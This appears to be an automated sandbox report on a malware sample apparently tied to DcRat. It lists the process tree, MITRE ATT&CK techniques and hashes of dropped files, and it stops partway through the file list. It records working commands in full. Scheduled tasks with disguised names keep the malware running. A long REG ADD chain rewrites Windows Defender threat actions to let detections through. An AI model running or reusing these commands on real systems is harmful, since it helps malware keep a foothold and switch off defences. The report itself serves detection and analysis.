schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\SearchHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\BlockComponentwebMonitordhcp\sppsvc.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\BlockComponentwebMonitordhcp\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\RegAsm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsm" /sc ONLOGON /tr "'C:\Users\Default User\RegAsm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\RegAsm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\RegAsm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsm" /sc ONLOGON /tr "'C:\Users\Default User\RegAsm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\RegAsm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5604

C:\Users\Admin\AppData\Roaming\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive.exe
1⤵
PID:4812

C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
1⤵
PID:5732

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
2⤵
PID:4012

C:\Windows\system32\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
2⤵
PID:6216

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
2⤵
PID:3384

C:\Windows\system32\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
2⤵
PID:7156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 6076 -ip 6076
1⤵
PID:1476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4612 -ip 4612
1⤵
PID:5412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A29C.bat" "
1⤵
PID:1064

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
2⤵
PID:5488

C:\Users\Admin\AppData\Local\Temp\D593.exe
C:\Users\Admin\AppData\Local\Temp\D593.exe
1⤵
PID:2644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5237.bat" "
1⤵
PID:3244

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
2⤵
PID:3596

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004E0
1⤵
PID:4612

C:\Windows\explorer.exe
explorer.exe
1⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 4912 -ip 4912
1⤵
PID:4292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 2420 -ip 2420
1⤵
PID:5480

C:\Users\Admin\AppData\Roaming\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive.exe
1⤵
PID:3848

C:\BlockComponentwebMonitordhcp\sppsvc.exe
C:\BlockComponentwebMonitordhcp\sppsvc.exe
1⤵
PID:3300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3884 -ip 3884
1⤵
PID:3496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2104 -ip 2104
1⤵
PID:3816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 3924 -ip 3924
1⤵
PID:712

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3048

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
PID:4448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 4360 -ip 4360
1⤵
PID:6304

C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\rmugjdj.exe
C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\rmugjdj.exe my /FJsite_idFcc 385118 /S
1⤵
PID:3452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:6772

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:6600

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:6468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:4756

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:7060

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:5488

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:6276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:4112

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:6276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:4564

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:4372

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:6848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:7008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:5396

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:4464

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:3008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:4136

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:6540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:6308

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:5664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1180

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:6920

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:6704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:2276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:1912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:6904

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:2380

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:7324

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:8040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3080

C:\Program Files (x86)\Microsoft.NET\SearchHost.exe
"C:\Program Files (x86)\Microsoft.NET\SearchHost.exe"
1⤵
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 2380 -ip 2380
1⤵
PID:5172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 6476 -ip 6476
1⤵
PID:2108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 1400 -ip 1400
1⤵
PID:3612

C:\Users\Admin\AppData\Roaming\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive.exe
1⤵
PID:5252

C:\Program Files\Internet Explorer\SIGNUP\System.exe
"C:\Program Files\Internet Explorer\SIGNUP\System.exe"
1⤵
PID:1576

C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe
1⤵
PID:3492

C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\ndmBfRA.exe
C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\ndmBfRA.exe my /yosite_idNAK 385118 /S
1⤵
PID:7560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4364 -ip 4364
1⤵
PID:7612

C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\ndmBfRA.exe
C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\ndmBfRA.exe my /yosite_idNAK 385118 /S
1⤵
PID:7452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4916 -ip 4916
1⤵
PID:8052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 7076 -ip 7076
1⤵
PID:7324

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Scripting

T1064

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\agentDllDhcp.exe

Filesize
828KB

MD5
6b3e49b6d32aca957297d8c71e698737

SHA1
73294c085a65af8528ea636ee15132020ba38fe5

SHA256
fef594135e18a708750abad999febeba51d6efe9d6d3073f02a1acb12731eed8

SHA512
151ce51cbcce1ee4cb8b145b02124efc1cb93ef9320da60321cd179d8544930c7f2aa9af4cd4ddd0a71dc32ef5b0069fd8e6bb5e76359d3286d526ccf7e5510b

Download Submit
C:\ProgramData\KageNoHitobito_ReadMe.txt

Filesize
965B

MD5
f478fe972700407d0412ced6b714c869

SHA1
1188fa95bd5a7ca141c1471efe46f9b8578ce1a8

SHA256
fdc60290be8fe844078f473571c0c1310c0f7af16284ad5cb3fa986db749af10

SHA512
06a3164c063cc71126b9d8e7fc5b2c1d8855aa09a28d24bb3245376c46d059e55df9966e875715093008227ff2310102f9f9d162da03dc21b65f9c758ac0e82a

Download Submit
C:\ProgramData\MediaDevicePicker 3.0.194.66\MediaDevicePicker 3.0.194.66.exe

Filesize
3.2MB

MD5
de879b52a630d7c7e276b7dc2cd86627

SHA1
1695a629a150069bd404d169da2e77a969a5c93a

SHA256
65779eb008227048b891c954c359314d54c887c4b1f47a2add887870749c4fd2

SHA512
fcb9a26137f795931fe01cc70344c748b0ef64345ecf9af9f00421649436ea885ebb193dc2110a4b8847fc913cc148e0ec260e176e703cf53c79c9a3bb4539ed

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
c218d47ed2987d71ce70ede6d261bb65

SHA1
6c7c373f1d4bed8afc907ab500e0628311644d3f

SHA256
c10b022708153c76ef6616b1e644667fbe97d3eb49365c5cd668477e7e024528

SHA512
f09d76bdf14e51b3dfe66ce1668fcfe56a5b0731f8b47b8eedc1f658446461cec82359f6af033f094592ad47d4e56e50cda40c7880eab03c82f0fc2d89b7276f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

Filesize
14KB

MD5
6e83b0eb544e044271cf53eddbd12ce7

SHA1
ee873923d723bd079caf5295d51dfbaac6104fff

SHA256
19c1c236c63b8cec0f90ca021d0a731d93e73f3fc9dbfbdeb729b444a50b60b1

SHA512
e7f5894c3ca0c57125adc2d41efd87c38f2f694f7bfa7aa7ca75e95e83d5a76f97e080b7c62264c12fe74a3e95af191523703d63803635be6fbcb54e1b30a140

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
65KB

MD5
f259dde7db5a741af894e15a84d29b17

SHA1
5d0eebe3e86604679fb0ef194461bac8ddcb1cdf

SHA256
2f54370e0abf6b4c129d4c1bd04cad4fefd5c2cfa12630892ffe60e63fa47a53

SHA512
c006462d6d4bb10c14fdfb148b2f42ff865be8cf0abc87972291c217b95099df3f06a5bfc480c4a08ec314ccad811c7a105e2d94c60a403cf730351fcb09d13c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
60KB

MD5
0e6ef8df136c226c530d42260aa4f3a4

SHA1
7b25339b028d7a936e27fbeadaa527895b4ebae2

SHA256
51117eda8eac70825b492d7683749e052c3e005b64c69f9304cbf5a38d2bbe5e

SHA512
2feb406e0e24f374926123d48c807918df22e61bc37a6f74bdc4daa21e7d49d00cc62ca22d4782d19fbb6ffe3a03356682ab066c3aae85b51fd8b7e2a45ead7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
60KB

MD5
535b473ec3e9c0fd5aad89062d7f20e8

SHA1
c900f90b3003452b975185c27bfb44c8f0b552c4

SHA256
f6bb190101537e41901392fb690045c5bf1cddaa954630e57c5d0b3410b2d6b0

SHA512
33f286b06e9198ca8ae5225c7796f0f176282e2386fa93a2450e1a65cdb235932ef8a0a778f6b16945f1496a5e12e3ba6e3905f02a47a9cbb92e14448f463c86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3273efb1dba0e5749635f5800d00b531

SHA1
05040c0342e0ec690589a9c7b6a05c50ed95d15b

SHA256
22599b9b19e8e7bf827c9bab89c63e3a1e854eb4f7394953ce4aad724bdf9b54

SHA512
15c56cebc88d22b4c11d2303eb0b49236f320e7008dc9a88fb3a355ca7afa47475a2fc992c70c4b42e03d9703c6f1ed91ceb89d59f5dcb37f5bcfcfc50d1a5c4

Download Submit
C:\Users\Admin\AppData\Local\RuntimeBroker2.exe

Filesize
837KB

MD5
3ecf5cab8e919a5bb0c047bd80e5dfee

SHA1
4abdb1574cec441b1efdea63f1a30b3318bad32e

SHA256
c69fa2eab697e81ab16220fb7cff13f1feed69bb84a9df039920501eb699c7bc

SHA512
3b871383921202e1a06c55ad1774b7403be754fc1e567260867f14e4f2ccc31a9bf6deb9ac22837277cea395f31db7213155318a96beb249e171ec186d25c15f

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092025351\additional_file0.tmp

Filesize
2.5MB

MD5
20d293b9bf23403179ca48086ba88867

SHA1
dedf311108f607a387d486d812514a2defbd1b9e

SHA256
fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348

SHA512
5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404092025351\installer_prefs_include.json

Filesize
230B

MD5
9d7e2fbccdfbb2dd596ba253c3351d46

SHA1
68a74423e1df7b7956038d65a1dcc44a241e2cd5

SHA256
